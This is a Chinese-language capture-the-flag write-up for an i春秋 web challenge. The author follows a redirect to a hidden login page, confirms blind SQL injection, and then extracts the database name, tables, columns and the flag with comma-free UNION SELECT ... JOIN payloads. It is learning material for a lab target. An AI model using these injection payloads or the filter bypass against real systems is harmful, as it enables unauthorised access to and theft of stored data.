今天在i春秋做题的时候遇到了一道非常好的题目,于是在参考了wp的基础上自己复现了一遍,算作一种技巧的学习与收藏吧。
题目i春秋连接:https://www.ichunqiu.com/battalion?t=1&r=54791
访问地址,发现什么都没有,
查看页面源代码,发现提示
访问地址
http://69ef94c7ef5e47b580ed5c7bae472bc4c3b492503f964143.game.ichunqiu.com/login.php?id=1
得到下面页面
我去,不会这就注入进去了吧?!话不多说,上sqlmap,
尝试了好多次,发现这就是个假的注入点,果然没那么简单啊,,,,
设置代理,利用工具Burp Suite看看究竟发生了什么,,,
可以看到在访问地址
http://69ef94c7ef5e47b580ed5c7bae472bc4c3b492503f964143.game.ichunqiu.com的时候,302,页面重定向了。
注意看,下面两个图片
在302重定向回复报文中,url已经改变,原来箭头那里是3l,被重定向到31,6不6,哈哈。并且看到了新的页面地址l0gin.php?id=1
访问地址
http://69ef94c7ef5e47b580ed5c7bae472bc4c3b492503f964143.game.ichunqiu.com/l0gin.php?id=1
得到下图
修改参数,再次执行,
OK,看来这个确实是一个注入点,再用sqlmap测试,从结果可以看到这既是一个基于布尔的盲注,也是一个基于时间的盲注
接着爆数据库,发现无法得到,没办法,只能手工注入了,
这里我选择基于布尔的盲注,因为这样的回显比基于时间的看起来明显。
输入参数
1' and ascii(substr((select database()),1,1))>64 %23
查询数据库名,发现,注入失败,并且,后面的sql语句被过滤掉了,id字段输出的应该就是过滤后的sql语句了
从网上看到一篇讲不需要逗号的mysql注入文章,http://wonderkun.cc/index.html/?p=442
于是重新构造payload,如id=-1' union select * from (select
group_concat(distinct(table_schema)) from information_schema.tables ) a
join (select version() ) b %23
可以看到数据库名称为sqli
紧接着,构造payload,获取表名
-1' union select * from (select group_concat(distinct(table_name))
from information_schema.tables where table_schema='sqli') a join
(select version() ) b %23
构造payload,获取字段名
-1' union select * from (select
group_concat(distinct(column_name)) from information_schema.columns
where table_schema='sqli' and table_name='users') a join (select
version() ) b %23
构造payload,获取字段值,得到flag{34303304-de0b-4bad-a0df-84eb8a420df8}
-1' union select * from (select group_concat(distinct(flag_9c861b688330)) from users) a join (select version() ) b %23
